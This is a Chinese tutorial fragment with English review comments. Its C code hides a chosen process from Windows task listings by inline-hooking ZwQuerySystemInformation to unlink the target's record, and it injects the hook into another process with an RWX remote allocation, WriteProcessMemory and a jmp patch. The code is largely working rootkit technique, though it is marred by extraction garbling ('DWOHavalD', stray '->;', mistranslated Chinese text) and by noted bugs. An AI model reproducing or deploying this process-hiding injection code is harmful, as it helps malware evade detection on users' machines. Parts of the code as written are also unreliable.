ACCESSring3 dll hide

/* Fragment: one ZwQuerySystemInformation(SystemProcessInformation, ...) call and a
 * walk of the SYSTEM_PROCESS_INFORMATION list it fills in. The variable
 * declarations, the status check and the buffer sizing are not part of this
 * excerpt. */
ZwQuerySystemInformation(SystemProcessInformation,SystemInformation,Length,ReturnLength);

 

 

 

  /* The list is a chain of variable-size records laid out inside
   * SystemInformation. */
  pSystemProcesses = (PSYSTEM_PROCESS_INFORMATION)SystemInformation;

  while (TRUE){

   /* NOTE: the label says "PID" but InheritedFromProcessId is the parent's id,
    * not this record's own id. The “ ” characters are typographic quotes from
    * extraction; C needs plain \" delimiters. */
   printf(“进程PID: %d\n”,pSystemProcesses->InheritedFromProcessId);

   /* NextEntryOffset == 0 marks the last record. */
   if (!pSystemProcesses->NextEntryOffset) {

    break;

   }

   /* Advance by the byte offset stored in the record itself. Every consumer of
    * this list depends on this link field; the hook further down the page
    * unlinks a record by rewriting that link (there called NextEntryDelta,
    * presumably the same field under an older type definition). */
   pSystemProcesses = (PSYSTEM_PROCESS_INFORMATION)((char
*)pSystemProcesses + pSystemProcesses->NextEntryOffset);

  }

 

 

 

当是我们需要隐藏的进程的时候，我们可以通过扩大NextEntryOffset的长度或者设置NextEntryOffset为0来隐藏进程。所以我们可以构造以下类似代码:

 

 

 

/*
 * HOOK_ZwQuerySystemInformation - replacement for ZwQuerySystemInformation.
 *
 * Forwards the caller's four arguments to the original function through
 * ZwQuerySystemInformationProxy (declared elsewhere, not on this page). When the
 * call succeeded and SystemInformationClass is
 * SystemProcessesAndThreadsInformation, it walks the SYSTEM_PROCESSES list in
 * SystemInformation and unlinks the record whose ProcessId equals the
 * placeholder 0x12345678 (SetHook, further down the page, overwrites that
 * constant with the real id before copying this code).
 *
 * @param SystemInformationClass  class requested by the caller, passed through
 * @param SystemInformation       caller's buffer; modified in place on success
 * @param SystemInformationLength passed through unchanged
 * @param ReturnLength            passed through unchanged
 * @return the NTSTATUS produced by the original call (ntStatus), never altered
 *
 * Review notes (defects visible in this listing, left as written):
 *  - Prev is declared without an initializer; when the matching record is the
 *    first one, Prev->NextEntryDelta writes through an indeterminate pointer.
 *  - The inline assembly is 32-bit x86 / MSVC only (push, eax, _asm).
 *  - `->;` in the ProcessId comparison is an extraction artefact for `->`.
 *  - This is a user-mode edit of one caller's own result buffer inside one
 *    patched process; code in processes without the hook, or anything that
 *    enumerates through a different path, still sees the record. Comparing the
 *    in-memory prologue of the exported function with its on-disk image is the
 *    usual way such an inline hook is detected.
 */
NTSTATUS

NTAPI

HOOK_ZwQuerySystemInformation(

         IN SYSTEM_INFORMATION_CLASS SystemInformationClass,

         OUT PVOID SystemInformation,

         IN ULONG SystemInformationLength,

         OUT PULONG ReturnLength OPTIONAL

         )

{

NTSTATUS ntStatus;

/* Prev: the record before the current one. NOTE: not initialized; it is only
 * assigned at the bottom of the loop, so a match on the very first record uses
 * an indeterminate pointer. */
PSYSTEM_PROCESSES pSystemProcesses=NULL,Prev;

 

/* Forward the call to the original via the proxy: arguments pushed
 * right-to-left (stdcall), the NTSTATUS comes back in eax. */
_asm{

  /* presumably saved around the call; restored by the pop below */
  push ebx

  push ReturnLength

  push SystemInformationLength

  push SystemInformation

  push SystemInformationClass

  call ZwQuerySystemInformationProxy
// Let the original function run to completion first; only then does it return
// the data we need, which is then modified inside that buffer below.

  mov ntStatus,eax

  pop ebx

}

 

/* Only the process/thread list of a successful call is touched; every other
 * class, and every failed call, is returned exactly as the original produced it. */
if (NT_SUCCESS(ntStatus) &&
SystemInformationClass==SystemProcessesAndThreadsInformation){

  pSystemProcesses = (PSYSTEM_PROCESSES)SystemInformation;

  while (TRUE){

   /* 0x12345678 is a placeholder value; SetHook overwrites it with the real id.
    * (`->;` is an extraction artefact for `->`.) */
   if (pSystemProcesses->;ProcessId==0x12345678){
// If this is the PID to hide, start modifying the data.

    if (pSystemProcesses->NextEntryDelta){

     // There are more records after the hidden one: make the previous
     // record's NextEntryDelta skip over this one straight to the next block.

     Prev->NextEntryDelta += pSystemProcesses->NextEntryDelta;

    }else{

     // The hidden process is the last record: zero the previous record's
     // NextEntryDelta so the walk ends before reaching it.

     Prev->NextEntryDelta=0;

    }

    break;

   }

   /* NextEntryDelta == 0 marks the last record. */
   if (!pSystemProcesses->NextEntryDelta) {

    break;

   }

   /* Remember the predecessor; this is the only place Prev is assigned. */
   Prev=pSystemProcesses;

   pSystemProcesses = (PSYSTEM_PROCESSES)((char *)pSystemProcesses +
pSystemProcesses->NextEntryDelta);

  }

}

return ntStatus;

}

 

 

 

我们为了不添加一个多余的DLL，所以必须以Shellcode形式注入到目标进程，不过要这样写完整的shellcode确实有点麻烦，我们可以取巧利用程序来实现。

 

 

 

我们把函数内需要重定位的地方全部利用__asm来实现，比如下面的

 

 

 

/* Excerpt of the inline-assembly call from HOOK_ZwQuerySystemInformation above,
 * repeated here to show the part of the function that calls through an absolute
 * address (ZwQuerySystemInformationProxy) and therefore needs no relocation when
 * the function body is copied elsewhere. 32-bit x86 / MSVC only. */
_asm{

  push ebx

  push ReturnLength

  push SystemInformationLength

  push SystemInformation

  push SystemInformationClass

  call ZwQuerySystemInformationProxy
// Let the original function run to completion first; only then does it return
// the data we need, which is then modified inside that buffer.

  mov ntStatus,eax

  pop ebx

}

 

 

 

调用绝对地址来实现，这样就不需要重定位了。这样我们就可以把这个函数拷贝到目标进程了，再进行一下目标地址的计算就ok了。所以有类似下面的实现代码:

 

 

 

/*
 * SetHook - copy the code between FunStart and FunEnd (marker symbols, not shown
 * on this page) into process dwProcessId and redirect that process's
 * ZwQuerySystemInformation to the copied HOOK_ZwQuerySystemInformation.
 *
 * Steps, as written below: open the target with PROCESS_ALL_ACCESS; allocate a
 * PAGE_EXECUTE_READWRITE region there; make the local code writable; save the
 * first five bytes of ZwQuerySystemInformation into the stub at dwCodeStart and
 * store the original's address at dwCodeStart+6; build a 5-byte E9 (jmp rel32)
 * to the hook's remote address; replace the 0x12345678 placeholder with
 * dwHideId; write the code block and then the 5-byte patch into the target.
 *
 * @param dwProcessId  target process id
 * @param dwHideId     process id the copied hook will unlink
 * @return TRUE only when the final WriteProcessMemory (the 5-byte patch)
 *         succeeded; FALSE when OpenProcess or VirtualAllocEx failed or either
 *         WriteProcessMemory failed.
 *
 * Review notes (left as written in this listing):
 *  - The second VirtualProtect passes PAGE_EXECUTE_READWRITE instead of
 *    OldProtect, so the local code's original protection is never restored.
 *  - If ZwQuerySystemInformation is NULL the patching block is skipped, but the
 *    unpatched code is still written to the target (the WriteProcessMemory
 *    calls sit outside that if).
 *  - The placeholder scan reads a DWORD at every byte up to dwCodeEnd, so its
 *    last three iterations read past dwCodeEnd.
 *  - "(DWOHavalD)" is an extraction artefact for "(DWORD)"; the printf calls use
 *    typographic quotes and %x for pointer/DWORD arguments (32-bit assumption).
 *  - The remote patch is written at the local address of
 *    ZwQuerySystemInformation, i.e. it relies on that function being mapped at
 *    the same address in both processes.
 *  - Footprint a defender can look for: a PROCESS_ALL_ACCESS handle to the
 *    target, an RWX VirtualAllocEx, WriteProcessMemory into it, and a jmp
 *    overwriting the prologue of an exported system function (in-memory vs
 *    on-disk prologue comparison).
 */
BOOLEAN SetHook(DWORD dwProcessId,DWORD dwHideId)

{

BOOLEAN bRet=FALSE;

DWORD OldProtect;

DWORD dwCodeStart,dwCodeEnd,dwCodeSize;

/* 0xE9 = jmp rel32; the four operand bytes are filled in below. */
BYTE HookCode[5]={0xE9,0,0,0,0};

HANDLE hProcess=NULL;

PVOID RemoteAllocBase=NULL;

DWORD dwFunAddress;

PUCHAR pBuffer;

 

/* FunStart/FunEnd bracket the code to be copied; GetFunAddress is not shown on
 * this page. */
dwCodeStart = GetFunAddress((PUCHAR)FunStart);

dwCodeEnd = GetFunAddress((PUCHAR)FunEnd);

dwCodeSize = dwCodeEnd-dwCodeStart;

 

hProcess = OpenProcess(PROCESS_ALL_ACCESS,

         FALSE,

         dwProcessId

         );

 

if (hProcess){

  /* Writable and executable at the same time in the target. */
  RemoteAllocBase = VirtualAllocEx(hProcess,

           NULL,

           dwCodeSize,

           MEM_COMMIT,

           PAGE_EXECUTE_READWRITE

           );

  if (RemoteAllocBase){

   /* %x with a PVOID argument: only matches on 32-bit. */
   printf(“\t申请内部存款和储蓄器地址:0x%x\n”,RemoteAllocBase);

   /* Global defined elsewhere; records the remote base for later use. */
   g_lpRemoteAllocBase = RemoteAllocBase;

   if (ZwQuerySystemInformation){

    /* Make the local copy of the code writable so it can be patched in place. */
    bRet=VirtualProtect((PVOID)dwCodeStart,

         dwCodeSize,

         PAGE_EXECUTE_READWRITE,

         &OldProtect

         );

    if (bRet){

     /* Save the original's first 5 bytes (the ones the jmp will overwrite)
      * into the stub at the start of the copied code. */
     memcpy((PVOID)dwCodeStart,ZwQuerySystemInformation,5);
// The backup bytes can be taken from this process or from the remote one;
// normally they are the same.

     /* Store the original's address at a fixed offset (6) in the stub.
      * "(DWOHavalD)" is an extraction artefact for "(DWORD)". */
     *(DWORD
*)(dwCodeStart+6)=(DWOHavalD)ZwQuerySystemInformation;// No signature scan is needed here; the operand is known to start at this fixed byte offset.

     /* Redundant: HookCode[0] was already initialized to 0xE9. */
     *HookCode=0xE9;

     /* Translate the hook's local address into its address inside the remote
      * copy: local - local code start + remote base. */
     dwFunAddress =
GetFunAddress((PUCHAR)HOOK_ZwQuerySystemInformation);

     dwFunAddress -= dwCodeStart;

     dwFunAddress += (DWORD)RemoteAllocBase;
// Compute the address of HOOK_ZwQuerySystemInformation inside the target process.

   
 printf(“\tHOOK_ZwQuerySystemInformation内部存款和储蓄器地址:0x%x\n”,dwFunAddress);

     /* rel32 operand of the jmp placed at ZwQuerySystemInformation:
      * target - (source + 5). */
     *(DWORD
*)&HookCode[1]=dwFunAddress-5-(DWORD)ZwQuerySystemInformation;

 

     /* Scan the local hook body up to dwCodeEnd for the 0x12345678 placeholder
      * and replace its first occurrence with dwHideId. NOTE: the DWORD read at
      * the final bytes reaches up to 3 bytes past dwCodeEnd. */
     dwFunAddress =
GetFunAddress((PUCHAR)HOOK_ZwQuerySystemInformation);

     for (pBuffer=(PUCHAR)dwFunAddress;

       pBuffer<(PUCHAR)dwFunAddress+(dwCodeEnd-dwFunAddress);

       pBuffer++

          )

     {

      if (*(DWORD *)pBuffer==0x12345678){

       *(DWORD *)pBuffer = dwHideId;

       break;

      }

     }

     /* NOTE: passes PAGE_EXECUTE_READWRITE again rather than OldProtect, so
      * the original protection of the local code is not restored; the return
      * value is also ignored. */
     VirtualProtect((PVOID)dwCodeStart,

           dwCodeSize,

           PAGE_EXECUTE_READWRITE,

           &OldProtect

           );

    }

   }

   /* Reached even when the patching block above was skipped: the code block
    * is written to the target as-is. */
   bRet=WriteProcessMemory(hProcess,

         RemoteAllocBase,

         (PVOID)dwCodeStart,

         dwCodeSize,

         NULL

         );

   if (bRet){

    /* Install the 5-byte jmp at the *local* address of ZwQuerySystemInformation,
     * used here as the remote address. */
    bRet=WriteProcessMemory(hProcess,

          ZwQuerySystemInformation,

          HookCode,

          5,

          NULL

          );

   }

  }

  CloseHandle(hProcess);

}

return bRet;

}
